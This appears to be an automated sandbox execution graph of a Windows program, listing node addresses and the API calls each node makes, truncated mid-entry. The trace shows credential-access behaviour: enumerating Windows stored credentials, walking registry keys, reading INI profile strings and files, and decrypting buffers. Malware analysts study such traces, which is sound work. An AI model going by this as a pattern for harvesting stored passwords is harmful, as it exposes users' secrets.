                                                                                                                                                                                  execution_graph 34262 40fc40 70 API calls 34437 403640 21 API calls 34263 427fa4 42 API calls 34438 412e43 _endthreadex 34439 425115 76 API calls __fprintf_l 34440 43fe40 133 API calls 34266 425115 83 API calls __fprintf_l 34267 401445 memcpy memcpy DialogBoxParamA 34268 440c40 34 API calls 33237 444c4a 33256 444e38 33237->33256 33239 444c56 GetModuleHandleA 33240 444c68 __set_app_type __p__fmode __p__commode 33239->33240 33242 444cfa 33240->33242 33243 444d02 __setusermatherr 33242->33243 33244 444d0e 33242->33244 33243->33244 33257 444e22 _controlfp 33244->33257 33246 444d13 _initterm __getmainargs _initterm 33247 444d6a GetStartupInfoA 33246->33247 33249 444d9e GetModuleHandleA 33247->33249 33258 40cf44 33249->33258 33253 444dcf _cexit 33255 444e04 33253->33255 33254 444dc8 exit 33254->33253 33256->33239 33257->33246 33309 404a99 LoadLibraryA 33258->33309 33260 40cf60 33295 40cf64 33260->33295 33317 410d0e 33260->33317 33262 40cf6f 33321 40ccd7 ??2@YAPAXI 33262->33321 33264 40cf9b 33335 407cbc 33264->33335 33269 40cfc4 33353 409825 memset 33269->33353 33270 40cfd8 33358 4096f4 memset 33270->33358 33275 407e30 _strcmpi 33277 40cfee 33275->33277 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33281 40cff2 RegDeleteKeyA 33277->33281 33282 40d007 EnumResourceTypesA 33277->33282 33382 407948 free free 33278->33382 33279->33278 33281->33276 33284 40d047 33282->33284 33285 40d02f MessageBoxA 33282->33285 33283 40d1c4 33383 4080d4 33283->33383 33287 40d0a0 CoInitialize 33284->33287 33363 40ce70 33284->33363 33285->33276 33380 40cc26 strncat memset RegisterClassA CreateWindowExA 33287->33380 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33381 40c256 PostMessageA 33293->33381 33295->33253 33295->33254 33296 40d061 ??3@YAXPAX 33296->33278 33299 40d084 DeleteObject 33296->33299 33297 40d09e 33297->33287 33299->33278 33301 40d0f9 GetMessageA 33302 40d17b CoUninitialize 33301->33302 33303 40d10d 33301->33303 33302->33276 33304 40d113 TranslateAccelerator 33303->33304 33306 40d145 IsDialogMessage 33303->33306 33307 40d139 IsDialogMessage 33303->33307 33304->33303 33305 40d16d GetMessageA 33304->33305 33305->33302 33305->33304 33306->33305 33308 40d157 TranslateMessage DispatchMessageA 33306->33308 33307->33305 33307->33306 33308->33305 33310 404ac4 GetProcAddress 33309->33310 33311 404aec 33309->33311 33312 404ad4 33310->33312 33313 404add FreeLibrary 33310->33313 33315 404b13 33311->33315 33316 404afc MessageBoxA 33311->33316 33312->33313 33313->33311 33314 404ae8 33313->33314 33314->33311 33315->33260 33316->33260 33318 410d17 LoadLibraryA 33317->33318 33319 410d3c 33317->33319 33318->33319 33320 410d2b GetProcAddress 33318->33320 33319->33262 33320->33319 33322 40cd08 ??2@YAPAXI 33321->33322 33324 40cd26 33322->33324 33325 40cd2d 33322->33325 33394 404025 6 API calls 33324->33394 33327 40cd66 33325->33327 33328 40cd59 DeleteObject 33325->33328 33387 407088 33327->33387 33328->33327 33330 40cd6b 33390 4019b5 33330->33390 33333 4019b5 strncat 33334 40cdbf _mbscpy 33333->33334 33334->33264 33396 407948 free free 33335->33396 33337 407e04 33397 407a55 33337->33397 33340 407a1f malloc memcpy free free 33347 407cf7 33340->33347 33341 407ddc 33341->33337 33418 407a1f 33341->33418 33343 407d7a free 33343->33347 33347->33337 33347->33340 33347->33341 33347->33343 33400 40796e strlen 33347->33400 33410 406f30 33347->33410 33348 40796e 7 API calls 33348->33337 33349 407e30 33350 407e38 33349->33350 33351 407e57 33349->33351 33350->33351 33352 407e41 _strcmpi 33350->33352 33351->33269 33351->33270 33352->33350 33352->33351 33423 4097ff 33353->33423 33355 409854 33428 409731 33355->33428 33359 4097ff 3 API calls 33358->33359 33360 409723 33359->33360 33448 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33360->33448 33362 40972b 33362->33275 33449 4023b2 33363->33449 33369 40ced3 33544 40cdda 7 API calls 33369->33544 33370 40cece 33373 40cf3f 33370->33373 33490 40c3d0 memset GetModuleFileNameA strrchr 33370->33490 33373->33296 33373->33297 33376 40ceed 33518 40affa 33376->33518 33380->33293 33381->33301 33382->33283 33384 4080e1 33383->33384 33385 4080da free 33383->33385 33386 407948 free free 33384->33386 33385->33384 33386->33295 33395 406fc7 memset _mbscpy 33387->33395 33389 40709f CreateFontIndirectA 33389->33330 33391 4019e1 33390->33391 33392 4019c2 strncat 33391->33392 33393 4019e5 memset LoadIconA 33391->33393 33392->33391 33393->33333 33394->33325 33395->33389 33396->33347 33398 407a65 33397->33398 33399 407a5b free 33397->33399 33398->33349 33399->33398 33401 4079a1 33400->33401 33402 407998 free 33400->33402 33404 406f30 3 API calls 33401->33404 33403 4079ab 33402->33403 33405 4079c4 33403->33405 33406 4079bb free 33403->33406 33404->33403 33408 406f30 3 API calls 33405->33408 33407 4079d0 memcpy 33406->33407 33407->33347 33409 4079cf 33408->33409 33409->33407 33411 406f37 malloc 33410->33411 33412 406f7d 33410->33412 33414 406f73 33411->33414 33415 406f58 33411->33415 33412->33347 33414->33347 33416 406f6c free 33415->33416 33417 406f5c memcpy 33415->33417 33416->33414 33417->33416 33419 407a38 33418->33419 33420 407a2d free 33418->33420 33422 406f30 3 API calls 33419->33422 33421 407a43 33420->33421 33421->33348 33422->33421 33439 406f96 GetModuleFileNameA 33423->33439 33425 409805 strrchr 33426 409814 33425->33426 33427 409817 _mbscat 33425->33427 33426->33427 33427->33355 33440 44b090 33428->33440 33433 40930c 3 API calls 33434 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33433->33434 33435 4097c5 LoadStringA 33434->33435 33438 4097db 33435->33438 33437 4097f3 33437->33276 33438->33435 33438->33437 33447 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33438->33447 33439->33425 33441 40973e _mbscpy _mbscpy 33440->33441 33442 40930c 33441->33442 33443 44b090 33442->33443 33444 409319 memset GetPrivateProfileStringA 33443->33444 33445 409374 33444->33445 33446 409364 WritePrivateProfileStringA 33444->33446 33445->33433 33446->33445 33447->33438 33448->33362 33545 409c1c 33449->33545 33452 401e69 memset 33584 410dbb 33452->33584 33455 401ec2 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33455->33615 33456 401ed4 33600 406f81 GetFileAttributesA 33456->33600 33459 401ee6 strlen strlen 33461 401f15 33459->33461 33462 401f28 33459->33462 33616 4070e3 strlen _mbscat _mbscpy _mbscat 33461->33616 33601 406f81 GetFileAttributesA 33462->33601 33465 401f35 33602 401c31 33465->33602 33468 401f75 33614 410a9c RegOpenKeyExA 33468->33614 33469 401c31 7 API calls 33469->33468 33471 401f91 33472 402187 33471->33472 33473 401f9c memset 33471->33473 33475 402195 ExpandEnvironmentStringsA 33472->33475 33476 4021a8 _strcmpi 33472->33476 33617 410b62 RegEnumKeyExA 33473->33617 33626 406f81 GetFileAttributesA 33475->33626 33476->33369 33476->33370 33478 40217e RegCloseKey 33478->33472 33479 401fd9 atoi 33480 401fef memset memset sprintf 33479->33480 33488 401fc9 33479->33488 33618 410b1e 33480->33618 33483 402165 33483->33478 33484 406f81 GetFileAttributesA 33484->33488 33485 402076 memset memset strlen strlen 33485->33488 33486 4070e3 strlen _mbscat _mbscpy _mbscat 33486->33488 33487 4020dd strlen strlen 33487->33488 33488->33478 33488->33479 33488->33483 33488->33484 33488->33485 33488->33486 33488->33487 33489 402167 _mbscpy 33488->33489 33625 410b62 RegEnumKeyExA 33488->33625 33489->33478 33491 40c422 33490->33491 33492 40c425 _mbscat _mbscpy _mbscpy 33490->33492 33491->33492 33493 40c49d 33492->33493 33494 40c512 33493->33494 33495 40c502 GetWindowPlacement 33493->33495 33496 40c538 33494->33496 33647 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33494->33647 33495->33494 33640 409b31 33496->33640 33500 40ba28 33501 40ba87 33500->33501 33507 40ba3c 33500->33507 33650 406c62 LoadCursorA SetCursor 33501->33650 33503 40ba8c 33651 410a9c RegOpenKeyExA 33503->33651 33652 4107f1 33503->33652 33655 410808 33503->33655 33659 404734 33503->33659 33667 404785 33503->33667 33670 403c16 33503->33670 33504 40ba43 _mbsicmp 33504->33507 33505 40baa0 33506 407e30 _strcmpi 33505->33506 33510 40bab0 33506->33510 33507->33501 33507->33504 33744 40b5e5 10 API calls 33507->33744 33508 40bafa SetCursor 33508->33376 33510->33508 33511 40baf1 qsort 33510->33511 33511->33508 34204 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33518->34204 33520 40b00e 33521 40b016 33520->33521 33522 40b01f GetStdHandle 33520->33522 34205 406d1a CreateFileA 33521->34205 33524 40b01c 33522->33524 33525 40b035 33524->33525 33526 40b12d 33524->33526 34206 406c62 LoadCursorA SetCursor 33525->34206 34210 406d77 9 API calls 33526->34210 33529 40b136 33539 40c580 33529->33539 33530 40b087 33537 40b0a1 33530->33537 34208 40a699 12 API calls 33530->34208 33531 40b042 33531->33530 33531->33537 34207 40a57c strlen WriteFile 33531->34207 33534 40b0d6 33535 40b116 CloseHandle 33534->33535 33536 40b11f SetCursor 33534->33536 33535->33536 33536->33529 33537->33534 34209 406d77 9 API calls 33537->34209 33540 40c597 33539->33540 33541 40c58b 33539->33541 33540->33373 34211 404156 33541->34211 33544->33370 33557 409a32 33545->33557 33548 409c80 memcpy memcpy 33549 409cda 33548->33549 33549->33548 33550 408db6 12 API calls 33549->33550 33551 409d18 ??2@YAPAXI ??2@YAPAXI 33549->33551 33550->33549 33552 409d8b 33551->33552 33554 409d54 ??2@YAPAXI 33551->33554 33567 409b9c 33552->33567 33554->33552 33556 4023c1 33556->33452 33558 409a44 33557->33558 33559 409a3d ??3@YAXPAX 33557->33559 33560 409a52 33558->33560 33561 409a4b ??3@YAXPAX 33558->33561 33559->33558 33562 409a63 33560->33562 33563 409a5c ??3@YAXPAX 33560->33563 33561->33560 33564 409a83 ??2@YAPAXI ??2@YAPAXI 33562->33564 33565 409a73 ??3@YAXPAX 33562->33565 33566 409a7c ??3@YAXPAX 33562->33566 33563->33562 33564->33548 33565->33566 33566->33564 33568 407a55 free 33567->33568 33569 409ba5 33568->33569 33570 407a55 free 33569->33570 33571 409bad 33570->33571 33572 407a55 free 33571->33572 33573 409bb5 33572->33573 33574 407a55 free 33573->33574 33575 409bbd 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bd0 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409bda 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409be4 33580->33581 33582 407a1f 4 API calls 33581->33582 33583 409bee 33582->33583 33583->33556 33585 410d0e 2 API calls 33584->33585 33586 410dca 33585->33586 33587 410dfd memset 33586->33587 33627 4070ae 33586->33627 33588 410e1d 33587->33588 33630 410a9c RegOpenKeyExA 33588->33630 33592 410dee SHGetSpecialFolderPathA 33593 401e9e strlen strlen 33592->33593 33593->33455 33593->33456 33594 410e4a 33595 410e7f _mbscpy 33594->33595 33631 410d3d _mbscpy 33594->33631 33595->33593 33597 410e5b 33632 410add RegQueryValueExA 33597->33632 33599 410e73 RegCloseKey 33599->33595 33600->33459 33601->33465 33633 410a9c RegOpenKeyExA 33602->33633 33604 401c4c 33605 401cad 33604->33605 33634 410add RegQueryValueExA 33604->33634 33605->33468 33605->33469 33607 401c6a 33608 401c71 strchr 33607->33608 33609 401ca4 RegCloseKey 33607->33609 33608->33609 33610 401c85 strchr 33608->33610 33609->33605 33610->33609 33611 401c94 33610->33611 33635 406f06 strlen 33611->33635 33613 401ca1 33613->33609 33614->33471 33615->33456 33616->33462 33617->33488 33638 410a9c RegOpenKeyExA 33618->33638 33620 410b34 33621 410b5d 33620->33621 33639 410add RegQueryValueExA 33620->33639 33621->33488 33623 410b4c RegCloseKey 33623->33621 33625->33488 33626->33476 33628 4070bd GetVersionExA 33627->33628 33629 4070ce 33627->33629 33628->33629 33629->33587 33629->33592 33630->33594 33631->33597 33632->33599 33633->33604 33634->33607 33636 406f17 33635->33636 33637 406f1a memcpy 33635->33637 33636->33637 33637->33613 33638->33620 33639->33623 33641 409b40 33640->33641 33643 409b4e 33640->33643 33648 409901 memset SendMessageA 33641->33648 33644 409b99 33643->33644 33645 409b8b 33643->33645 33644->33500 33649 409868 SendMessageA 33645->33649 33647->33496 33648->33643 33649->33644 33650->33503 33651->33505 33653 410807 33652->33653 33654 4107fc FreeLibrary 33652->33654 33653->33505 33654->33653 33656 410816 33655->33656 33657 4107f1 FreeLibrary 33656->33657 33658 410825 33657->33658 33658->33505 33660 404785 FreeLibrary 33659->33660 33661 40473b LoadLibraryA 33660->33661 33662 40474c GetProcAddress 33661->33662 33665 40476e 33661->33665 33663 404764 33662->33663 33662->33665 33663->33665 33664 404781 33664->33505 33665->33664 33666 404785 FreeLibrary 33665->33666 33666->33664 33668 4047a3 33667->33668 33669 404799 FreeLibrary 33667->33669 33668->33505 33669->33668 33671 4107f1 FreeLibrary 33670->33671 33672 403c30 LoadLibraryA 33671->33672 33673 403c5e 33672->33673 33674 403c44 GetProcAddress 33672->33674 33675 4107f1 FreeLibrary 33673->33675 33676 403c6b 33673->33676 33674->33673 33675->33676 33677 404734 3 API calls 33676->33677 33678 403c86 33677->33678 33745 4036e5 33678->33745 33681 4036e5 27 API calls 33682 403c9a 33681->33682 33683 4036e5 27 API calls 33682->33683 33684 403ca4 33683->33684 33685 4036e5 27 API calls 33684->33685 33686 403cae 33685->33686 33757 4085d2 33686->33757 33694 403ce5 33695 403cf7 33694->33695 33945 402bd1 40 API calls 33694->33945 33805 410a9c RegOpenKeyExA 33695->33805 33698 403d0a 33699 403d1c 33698->33699 33946 402bd1 40 API calls 33698->33946 33806 402c5d 33699->33806 33703 4070ae GetVersionExA 33704 403d31 33703->33704 33824 410a9c RegOpenKeyExA 33704->33824 33706 403d51 33707 403d61 33706->33707 33825 402b22 memset 33706->33825 33834 410a9c RegOpenKeyExA 33707->33834 33710 403d87 33711 403d97 33710->33711 33712 402b22 47 API calls 33710->33712 33835 410a9c RegOpenKeyExA 33711->33835 33712->33711 33714 403dbd 33715 403dcd 33714->33715 33716 402b22 47 API calls 33714->33716 33717 410808 FreeLibrary 33715->33717 33716->33715 33718 403ddd 33717->33718 33719 404785 FreeLibrary 33718->33719 33720 403de8 33719->33720 33836 402fdb 33720->33836 33723 402fdb 34 API calls 33724 403e00 33723->33724 33852 4032b7 33724->33852 33733 403e3b 33735 403e73 33733->33735 33736 403e46 _mbscpy 33733->33736 33899 40fb00 33735->33899 33948 40f334 334 API calls 33736->33948 33744->33507 33746 4037c5 33745->33746 33747 4036fb 33745->33747 33746->33681 33949 410863 UuidFromStringA UuidFromStringA 33747->33949 33750 403716 strchr 33750->33746 33751 403730 33750->33751 33953 4021b6 memset 33751->33953 33753 40373f _mbscpy _mbscpy strlen 33754 4037a4 _mbscpy 33753->33754 33755 403789 sprintf 33753->33755 33954 4023e5 16 API calls 33754->33954 33755->33754 33758 4085e2 33757->33758 33955 4082cd 11 API calls 33758->33955 33762 408600 33763 403cba 33762->33763 33764 40860b memset 33762->33764 33775 40821d 33763->33775 33958 410b62 RegEnumKeyExA 33764->33958 33766 4086d2 RegCloseKey 33766->33763 33768 408637 33768->33766 33769 40865c memset 33768->33769 33959 410a9c RegOpenKeyExA 33768->33959 33962 410b62 RegEnumKeyExA 33768->33962 33960 410add RegQueryValueExA 33769->33960 33772 408694 33961 40848b 10 API calls 33772->33961 33774 4086ab RegCloseKey 33774->33768 33963 410a9c RegOpenKeyExA 33775->33963 33777 40823f 33778 403cc6 33777->33778 33779 408246 memset 33777->33779 33787 4086e0 33778->33787 33964 410b62 RegEnumKeyExA 33779->33964 33781 4082bf RegCloseKey 33781->33778 33783 40826f 33783->33781 33965 410a9c RegOpenKeyExA 33783->33965 33966 4080ed 11 API calls 33783->33966 33967 410b62 RegEnumKeyExA 33783->33967 33786 4082a2 RegCloseKey 33786->33783 33968 4045db 33787->33968 33790 4088ef 33976 404656 33790->33976 33792 40872d 33792->33790 33795 408737 wcslen 33792->33795 33794 40872b CredEnumerateW 33794->33792 33795->33790 33801 40876a 33795->33801 33796 40877a wcsncmp 33796->33801 33798 404734 3 API calls 33798->33801 33799 404785 FreeLibrary 33799->33801 33800 408812 memset 33800->33801 33802 40883c memcpy wcschr 33800->33802 33801->33790 33801->33796 33801->33798 33801->33799 33801->33800 33801->33802 33803 4088c3 LocalFree 33801->33803 33979 40466b _mbscpy 33801->33979 33802->33801 33803->33801 33804 410a9c RegOpenKeyExA 33804->33694 33805->33698 33980 410a9c RegOpenKeyExA 33806->33980 33808 402c7a 33809 402da5 33808->33809 33810 402c87 memset 33808->33810 33809->33703 33981 410b62 RegEnumKeyExA 33810->33981 33812 402d9c RegCloseKey 33812->33809 33813 410b1e 3 API calls 33814 402ce4 memset sprintf 33813->33814 33982 410a9c RegOpenKeyExA 33814->33982 33816 402d28 33817 402d3a sprintf 33816->33817 33985 402bd1 40 API calls 33816->33985 33983 410a9c RegOpenKeyExA 33817->33983 33822 402cb2 33822->33812 33822->33813 33823 402d9a 33822->33823 33984 410b62 RegEnumKeyExA 33822->33984 33986 402bd1 40 API calls 33822->33986 33823->33812 33824->33706 33987 410b62 RegEnumKeyExA 33825->33987 33827 402bbb RegCloseKey 33827->33707 33828 406f06 2 API calls 33830 402b58 33828->33830 33830->33827 33830->33828 33833 402bb8 33830->33833 33988 410a9c RegOpenKeyExA 33830->33988 33989 402a9d memset 33830->33989 33997 410b62 RegEnumKeyExA 33830->33997 33833->33827 33834->33710 33835->33714 34037 410a9c RegOpenKeyExA 33836->34037 33838 402ff9 33839 403006 memset 33838->33839 33840 40312c 33838->33840 34038 410b62 RegEnumKeyExA 33839->34038 33840->33723 33842 403122 RegCloseKey 33842->33840 33843 410b1e 3 API calls 33844 403058 memset sprintf 33843->33844 34039 410a9c RegOpenKeyExA 33844->34039 33846 4030a2 memset 34040 410b62 RegEnumKeyExA 33846->34040 33848 410b62 RegEnumKeyExA 33851 403033 33848->33851 33849 4030f9 RegCloseKey 33849->33851 33851->33842 33851->33843 33851->33846 33851->33848 33851->33849 34041 402db3 26 API calls 33851->34041 33853 4032d5 33852->33853 33854 4033a9 33852->33854 34042 4021b6 memset 33853->34042 33867 4034e4 memset memset 33854->33867 33856 4032e1 34043 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33856->34043 33858 4032ea 33859 4032f8 memset GetPrivateProfileSectionA 33858->33859 34044 4023e5 16 API calls 33858->34044 33859->33854 33864 40332f 33859->33864 33861 40339b strlen 33861->33854 33861->33864 33863 403350 strchr 33863->33864 33864->33854 33864->33861 34045 4021b6 memset 33864->34045 34046 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33864->34046 34047 4023e5 16 API calls 33864->34047 33868 410b1e 3 API calls 33867->33868 33869 40353f 33868->33869 33870 40357f 33869->33870 33871 403546 _mbscpy 33869->33871 33875 403985 33870->33875 34048 406d55 strlen _mbscat 33871->34048 33873 403565 _mbscat 34049 4033f0 19 API calls 33873->34049 34050 40466b _mbscpy 33875->34050 33879 4039aa 33881 4039ff 33879->33881 34051 40f460 memset memset 33879->34051 34072 40f6e2 33879->34072 34088 4038e8 21 API calls 33879->34088 33882 404785 FreeLibrary 33881->33882 33883 403a0b 33882->33883 33884 4037ca memset memset 33883->33884 34096 444551 memset 33884->34096 33886 4038e2 33886->33733 33947 40f334 334 API calls 33886->33947 33889 40382e 33890 406f06 2 API calls 33889->33890 33891 403843 33890->33891 33892 406f06 2 API calls 33891->33892 33893 403855 strchr 33892->33893 33894 403884 _mbscpy 33893->33894 33895 403897 strlen 33893->33895 33896 4038bf _mbscpy 33894->33896 33895->33896 33897 4038a4 sprintf 33895->33897 34108 4023e5 16 API calls 33896->34108 33897->33896 33900 44b090 33899->33900 33901 40fb10 RegOpenKeyExA 33900->33901 33902 403e7f 33901->33902 33903 40fb3b RegOpenKeyExA 33901->33903 33913 40f96c 33902->33913 33904 40fb55 RegQueryValueExA 33903->33904 33905 40fc2d RegCloseKey 33903->33905 33906 40fc23 RegCloseKey 33904->33906 33907 40fb84 33904->33907 33905->33902 33906->33905 33908 404734 3 API calls 33907->33908 33909 40fb91 33908->33909 33909->33906 33910 40fc19 LocalFree 33909->33910 33911 40fbdd memcpy memcpy 33909->33911 33910->33906 34113 40f802 11 API calls 33911->34113 33914 4070ae GetVersionExA 33913->33914 33915 40f98d 33914->33915 33916 4045db 7 API calls 33915->33916 33924 40f9a9 33916->33924 33917 40fae6 33918 404656 FreeLibrary 33917->33918 33919 403e85 33918->33919 33925 4442ea memset 33919->33925 33920 40fa13 memset WideCharToMultiByte 33921 40fa43 _strnicmp 33920->33921 33920->33924 33922 40fa5b WideCharToMultiByte 33921->33922 33921->33924 33923 40fa88 WideCharToMultiByte 33922->33923 33922->33924 33923->33924 33924->33917 33924->33920 33926 410dbb 10 API calls 33925->33926 33927 444329 33926->33927 34114 40759e strlen strlen 33927->34114 33932 410dbb 10 API calls 33933 444350 33932->33933 33934 40759e 3 API calls 33933->33934 33935 44435a 33934->33935 33936 444212 65 API calls 33935->33936 33937 444366 memset memset 33936->33937 33938 410b1e 3 API calls 33937->33938 33939 4443b9 ExpandEnvironmentStringsA strlen 33938->33939 33940 4443f4 _strcmpi 33939->33940 33941 4443e5 33939->33941 33942 403e91 33940->33942 33943 44440c 33940->33943 33941->33940 33942->33505 33944 444212 65 API calls 33943->33944 33944->33942 33945->33695 33946->33699 33947->33733 33948->33735 33950 40370e 33949->33950 33951 41088d 33949->33951 33950->33746 33950->33750 33951->33950 33952 4108be memcpy CoTaskMemFree 33951->33952 33952->33950 33953->33753 33954->33746 33956 40841c 33955->33956 33957 410a9c RegOpenKeyExA 33956->33957 33957->33762 33958->33768 33959->33768 33960->33772 33961->33774 33962->33768 33963->33777 33964->33783 33965->33783 33966->33786 33967->33783 33969 404656 FreeLibrary 33968->33969 33970 4045e3 LoadLibraryA 33969->33970 33971 404651 33970->33971 33972 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33970->33972 33971->33790 33971->33792 33971->33794 33973 40463d 33972->33973 33974 404643 33973->33974 33975 404656 FreeLibrary 33973->33975 33974->33971 33975->33971 33977 403cd2 33976->33977 33978 40465c FreeLibrary 33976->33978 33977->33804 33978->33977 33979->33801 33980->33808 33981->33822 33982->33816 33983->33822 33984->33822 33985->33817 33986->33822 33987->33830 33988->33830 33998 410b62 RegEnumKeyExA 33989->33998 33991 402b15 RegCloseKey 33991->33830 33995 402ad0 33995->33991 33996 402b14 33995->33996 33999 410a9c RegOpenKeyExA 33995->33999 34000 402a14 memset 33995->34000 34008 410b62 RegEnumKeyExA 33995->34008 33996->33991 33997->33830 33998->33995 33999->33995 34009 410b62 RegEnumKeyExA 34000->34009 34002 402a93 RegCloseKey 34002->33995 34004 402a48 34004->34002 34010 410a9c RegOpenKeyExA 34004->34010 34011 4027be 34004->34011 34026 410b62 RegEnumKeyExA 34004->34026 34008->33995 34009->34004 34010->34004 34012 40285a memset 34011->34012 34027 4029a2 RegQueryValueExA 34012->34027 34014 402885 34014->34012 34015 402998 RegCloseKey 34014->34015 34033 4021b6 memset 34014->34033 34015->34004 34017 402898 _mbscpy 34018 4029a2 4 API calls 34017->34018 34022 4028d4 34018->34022 34019 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34019->34022 34020 410ab6 RegQueryValueExA 34020->34022 34022->34019 34022->34020 34034 401989 _mbscpy _mbscat _mbscat 34022->34034 34035 402624 10 API calls 34022->34035 34024 40296d _mbscpy 34036 4023e5 16 API calls 34024->34036 34026->34004 34028 4029dd 34027->34028 34032 4029f2 34027->34032 34029 4029f7 WideCharToMultiByte 34028->34029 34030 4029e9 34028->34030 34029->34032 34031 406f06 2 API calls 34030->34031 34031->34032 34032->34014 34033->34017 34034->34022 34035->34024 34036->34014 34037->33838 34038->33851 34039->33851 34040->33851 34041->33851 34042->33856 34043->33858 34044->33859 34045->33863 34046->33864 34047->33864 34048->33873 34049->33870 34050->33879 34089 4078ba 34051->34089 34054 4078ba _mbsnbcat 34055 40f5a3 RegOpenKeyExA 34054->34055 34056 40f5c3 RegQueryValueExA 34055->34056 34057 40f6d9 34055->34057 34058 40f6d0 RegCloseKey 34056->34058 34059 40f5f0 34056->34059 34057->33879 34058->34057 34059->34058 34060 40f675 34059->34060 34093 40466b _mbscpy 34059->34093 34060->34058 34094 4012ee strlen 34060->34094 34062 40f611 34064 404734 3 API calls 34062->34064 34069 40f616 34064->34069 34065 40f69e RegQueryValueExA 34065->34058 34066 40f6c1 34065->34066 34066->34058 34067 40f66a 34068 404785 FreeLibrary 34067->34068 34068->34060 34069->34067 34070 40f661 LocalFree 34069->34070 34071 40f645 memcpy 34069->34071 34070->34067 34071->34070 34095 40466b _mbscpy 34072->34095 34074 40f6fa 34075 4045db 7 API calls 34074->34075 34076 40f708 34075->34076 34077 404734 3 API calls 34076->34077 34082 40f7e2 34076->34082 34083 40f715 34077->34083 34078 404656 FreeLibrary 34079 40f7f1 34078->34079 34080 404785 FreeLibrary 34079->34080 34081 40f7fc 34080->34081 34081->33879 34082->34078 34083->34082 34084 40f797 WideCharToMultiByte 34083->34084 34085 40f7b8 strlen 34084->34085 34086 40f7d9 LocalFree 34084->34086 34085->34086 34087 40f7c8 _mbscpy 34085->34087 34086->34082 34087->34086 34088->33879 34090 4078e6 34089->34090 34091 4078c7 _mbsnbcat 34090->34091 34092 4078ea 34090->34092 34091->34090 34092->34054 34093->34062 34094->34065 34095->34074 34109 410a9c RegOpenKeyExA 34096->34109 34098 40381a 34098->33886 34107 4021b6 memset 34098->34107 34099 44458b 34099->34098 34110 410add RegQueryValueExA 34099->34110 34101 4445a4 34102 4445dc RegCloseKey 34101->34102 34111 410add RegQueryValueExA 34101->34111 34102->34098 34104 4445c1 34104->34102 34112 444879 30 API calls 34104->34112 34106 4445da 34106->34102 34107->33889 34108->33886 34109->34099 34110->34101 34111->34104 34112->34106 34113->33910 34115 4075c9 34114->34115 34116 4075bb _mbscat 34114->34116 34117 444212 34115->34117 34116->34115 34133 407e9d 34117->34133 34120 44424d 34121 444274 34120->34121 34141 444196 34120->34141 34152 407ef8 34120->34152 34122 407e9d 9 API calls 34121->34122 34129 4442a0 34122->34129 34124 407ef8 9 API calls 34124->34129 34125 4442ce 34166 407f90 34125->34166 34129->34124 34129->34125 34131 444212 65 API calls 34129->34131 34162 407e62 34129->34162 34130 407f90 FindClose 34132 4442e4 34130->34132 34131->34129 34132->33932 34134 407f90 FindClose 34133->34134 34135 407eaa 34134->34135 34136 406f06 2 API calls 34135->34136 34137 407ebd strlen strlen 34136->34137 34138 407ee1 34137->34138 34139 407eea 34137->34139 34169 4070e3 strlen _mbscat _mbscpy _mbscat 34138->34169 34139->34120 34170 406d01 CreateFileA 34141->34170 34143 4441a1 34144 44420e 34143->34144 34145 4441aa GetFileSize 34143->34145 34144->34120 34146 444203 CloseHandle 34145->34146 34147 4441bd ??2@YAPAXI SetFilePointer 34145->34147 34146->34144 34171 407560 ReadFile 34147->34171 34149 4441e4 34172 444059 34149->34172 34153 407f03 FindFirstFileA 34152->34153 34154 407f24 FindNextFileA 34152->34154 34155 407f3f 34153->34155 34156 407f46 strlen strlen 34154->34156 34157 407f3a 34154->34157 34155->34156 34160 407f7f 34155->34160 34158 407f76 34156->34158 34156->34160 34159 407f90 FindClose 34157->34159 34203 4070e3 strlen _mbscat _mbscpy _mbscat 34158->34203 34159->34155 34160->34120 34163 407e94 34162->34163 34164 407e6c strcmp 34162->34164 34163->34129 34164->34163 34165 407e83 strcmp 34164->34165 34165->34163 34167 407fa3 34166->34167 34168 407f99 FindClose 34166->34168 34167->34130 34168->34167 34169->34139 34170->34143 34171->34149 34173 44b090 34172->34173 34174 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34173->34174 34187 44338b 6 API calls 34174->34187 34176 44409f 34177 4440bf strlen 34176->34177 34188 4434fc ??3@YAXPAX ??2@YAPAXI 34177->34188 34179 4440df memcpy 34189 443607 34179->34189 34181 44413d ??3@YAXPAX 34199 443473 9 API calls 34181->34199 34184 406f06 2 API calls 34184->34181 34186 44418f ??3@YAXPAX 34186->34146 34187->34176 34188->34179 34200 407948 free free 34189->34200 34191 443639 34201 407948 free free 34191->34201 34193 44391c 34193->34181 34193->34184 34194 407a1f 4 API calls 34196 443644 34194->34196 34195 443528 19 API calls 34195->34196 34196->34193 34196->34194 34196->34195 34197 44379d memcpy 34196->34197 34202 442d8e 9 API calls 34196->34202 34197->34196 34199->34186 34200->34191 34201->34196 34202->34196 34203->34160 34204->33520 34205->33524 34206->33531 34207->33530 34208->33537 34209->33534 34210->33529 34212 404785 FreeLibrary 34211->34212 34213 4041b3 34212->34213 34214 410808 FreeLibrary 34213->34214 34215 4041c4 34214->34215 34216 404785 FreeLibrary 34215->34216 34217 4041df 34216->34217 34222 404104 34217->34222 34221 4041eb ??3@YAXPAX 34221->33540 34223 4080d4 free 34222->34223 34224 404111 34223->34224 34225 4080d4 free 34224->34225 34226 40411c 34225->34226 34253 4078ed 34226->34253 34231 404143 34233 407a55 free 34231->34233 34232 404135 SetCurrentDirectoryA 34232->34231 34234 40414b 34233->34234 34235 407a55 free 34234->34235 34236 404153 34235->34236 34237 409a98 34236->34237 34238 409a32 5 API calls 34237->34238 34239 409aa6 34238->34239 34240 409ab9 34239->34240 34241 407a55 free 34239->34241 34243 407a55 free 34240->34243 34244 409acc 34240->34244 34242 409ab2 ??3@YAXPAX 34241->34242 34242->34240 34247 409ac5 ??3@YAXPAX 34243->34247 34245 